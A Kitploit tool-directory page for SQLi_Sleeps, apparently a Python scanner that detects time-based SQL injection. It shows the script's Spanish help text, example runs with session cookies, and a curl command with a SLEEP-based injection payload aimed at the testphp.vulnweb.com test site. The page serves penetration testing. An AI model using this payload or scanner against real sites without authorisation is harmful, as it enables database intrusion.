Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
SQLi_Sleeps | Kitploit
Tools/GitHubGitHub/hernanrodriguez1/sqli_sleeps
Web Vulnerability ScannersWeb Application ExploitationWeb SecurityPenetration Testing
GitHubhernanrodriguez1/sqli_sleeps

SQLi_Sleeps

View Repository
127310 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

SQLi_Sleeps

It is a simple script that allows to find SQLi vulnerabilities, obtaining the response time greater than 20 seconds per medium and time-based injection.

root@kitploit:~
usage: SQLi_Sleeps2.py [-h] -u URLS -d DATA [-c COOKIE]

Realiza una petición GET a múltiples URLs con diferentes datos.

options:
  -h, --help            show this help message and exit
  -u URLS, --urls URLS  Archivo de texto con las URLs a las que se les realizará la petición GET.
  -d DATA, --data DATA  Archivo de texto con los datos que se agregarán a las URLs.
  -c COOKIE, --cookie COOKIE
                        Cookie a incluir en la petición GET.

# Cookie simple
python3 script.py -u urls.txt -d data.txt -c "session=abc123"

# Múltiples cookies
python3 script.py -u urls.txt -d data.txt -c "session=abc123; user_id=456"

# Sin cookie
python3 script.py -u urls.txt -d data.txt

root@kitploit:~
cat urls.txt | sed 's/FUZZ//g'

image

PoC

root@kitploit:~
python3 SQLi_Sleeps2.py -u urls.txt -d data.txt

image

Manual analysis

root@kitploit:~
time curl "http://testphp.vulnweb.com/search.php?test=query'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z" -I

image

Download Tool